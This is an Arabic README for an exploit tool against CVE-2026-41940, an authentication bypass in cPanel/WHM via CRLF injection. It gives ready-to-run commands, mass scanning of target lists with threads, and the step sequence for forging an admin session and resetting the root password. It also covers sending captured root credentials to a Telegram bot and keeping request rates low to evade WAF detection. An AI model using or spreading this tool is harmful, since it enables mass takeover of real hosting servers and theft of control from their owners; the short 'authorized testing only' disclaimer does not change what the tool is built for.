
نص استغلال لـ CVE-2026-41940، وهو تجاوز للمصادقة في cPanel/WHM باستخدام حقن CRLF للحصول على وصول كمسؤول وتغيير كلمة مرور الجذر، مع فحص متعدد الخيوط وإشعارات عبر تيليغرام.
CVE-2026-41940 – تجاوز المصادقة في cPanel/WHM + تغيير كلمة مرور الجذر يقوم هذا السكربت باستغلال ثغرة تجاوز المصادقة في cPanel/WHM (CVE-2026-41940) باستخدام تقنية حقن CRLF لتزوير جلسة مسؤول. بعد النجاح، يمكن للسكربت تغيير كلمة مرور المستخدم root في WHM وإرسال إشعار عبر Telegram.
تحذير: استخدمه فقط لاختبارات الأمان على الأنظمة التي تملكها أو حصلت على إذن كتابي لاختبارها. إساءة استخدام هذا السكربت للوصول غير القانوني تخالف القانون.
📦 تثبيت التبعيات (PIP) يتطلب هذا السكربت Python 3.6+ ومكتبتين خارجيتين. نفّذ الأمر التالي:
pip install requests urllib3 requests – لإرسال طلبات HTTP مرنة
urllib3 – يُستخدم لتعطيل تحذيرات SSL (الشهادات ذاتية التوقيع)
المكتبات الأخرى (argparse, json, re, threading, concurrent.futures, إلخ.) متوفرة بالفعل في المكتبة القياسية لـ Python.
🚀 طريقة الاستخدام
(اختياري) إذا كنت تريد إشعارات Telegram، عدّل سطرين في قسم HARDCODE TELEGRAM داخل السكربت:
python TELEGRAM_BOT_TOKEN = 'token_bot_dari_BotFather' TELEGRAM_CHAT_ID = 'chat_id_anda_atau_group' اتركهما كما هما (: و -) إذا كنت لا تريد الإشعارات.
الصيغة الأساسية bash python cve-2026-41940.py --target https://ip:2087 --password root123 python cve-2026-41940.py --targets-file targets.txt --password rahasia --threads 20 --output hasil.json python cve-2026-41940.py --target https://ip:2087 --check-only
الوسائط المتاحة الوسيط إلزامي؟ الوصف --target أحدهما هدف واحد، مثال https://192.168.1.100:2087 أو 192.168.1.100 (المنفذ الافتراضي 2087) --targets-file أحدهما ملف نصي يحتوي على قائمة الأهداف (سطر لكل هدف، بصيغة ip:port أو URL كامل) --password إذا لم يكن --check-only كلمة المرور الجديدة لمستخدم root في WHM --check-only لا فحص ما إذا كان الهدف عرضة للثغرة فقط، دون تغيير كلمة المرور --threads لا (الافتراضي 10) عدد الخيوط للتنفيذ المتوازي --timeout لا (الافتراضي 15) مهلة اتصال HTTP (بالثواني) --output لا حفظ النتائج (JSON) في ملف ملاحظة: سيتم إضافة المنفذ 2087 لـ WHM (SSL) تلقائيًا إذا لم يُذكر.
أمثلة على الاستخدام فحص ثغرة هدف واحد (اختبار فقط):
bash python cve-2026-41940.py --target https://203.0.113.10:2087 --check-only الاستغلال وتغيير كلمة مرور root إلى p4ssw0rd!:
bash python cve-2026-41940.py --target https://203.0.113.10:2087 --password p4ssw0rd! فحص عدة أهداف من ملف list.txt مع 20 خيطًا، وحفظ النتائج في sukses.json:
bash python cve-2026-41940.py --targets-file list.txt --password MyNewPass123 --threads 20 --output sukses.json مثال على محتوى list.txt:
text 192.168.1.1:2087 https://cpanel.example.com 203.0.113.99 5. المخرجات والإشعارات سيتم طباعة حالة كل هدف على الشاشة: [+] نجاح، [-] فشل، [!] خطأ، [*] قيد المعالجة.
إذا تم تضمين --output، سيتم حفظ جميع النتائج بصيغة JSON.
إذا تم ملء بيانات Telegram، سيرسل الاستغلال الناجح رسالة مثل:
text ✅ SUCCESSFUL EXPLOIT ✅ ┌ Target: 203.0.113.10:2087 ├ Username: root ├ Password: MyNewPass123 ├ WHM Version: 122.0.19 └ Time: 2025-03-20 10:15:30 UTC ⚙️ طريقة العمل باختصار ما قبل المصادقة – إرسال محاولة تسجيل دخول فاشلة للحصول على ملف تعريف الارتباط whostmgrsession.
حقن CRLF – إضافة حمولة Basic في ترويسة Authorization لإدراج سطر جلسة مزيف.
الانتشار – الوصول إلى /scripts2/listaccts للتأكد من إمكانية استغلال الثغرة.
التحقق – استدعاء json-api/version؛ إذا نجح، يمكن الوصول إلى WHM كجذر.
تغيير كلمة المرور – استدعاء واجهة برمجة التطبيقات passwd مع المعامل user=root وكلمة المرور الجديدة.
الإشعار – إرسال النتيجة إلى Telegram (إذا تم ملء التوكن).
⚠️ ملاحظات مهمة لا يكتشف السكربت إصدار cPanel/WHM مباشرة، لكنه سيعرض الإصدار إذا كان متاحًا.
قد تحتوي بعض الأهداف على mod_security أو WAF يحظر الحمولة. استخدم --threads بقيمة ليست عالية جدًا لتجنب الاكتشاف.
استخدمه دائمًا بإذن ومسؤولية أخلاقية.
المؤلف: dennisec (github.com/dennisec) الترخيص: للاستخدام التعليمي فقط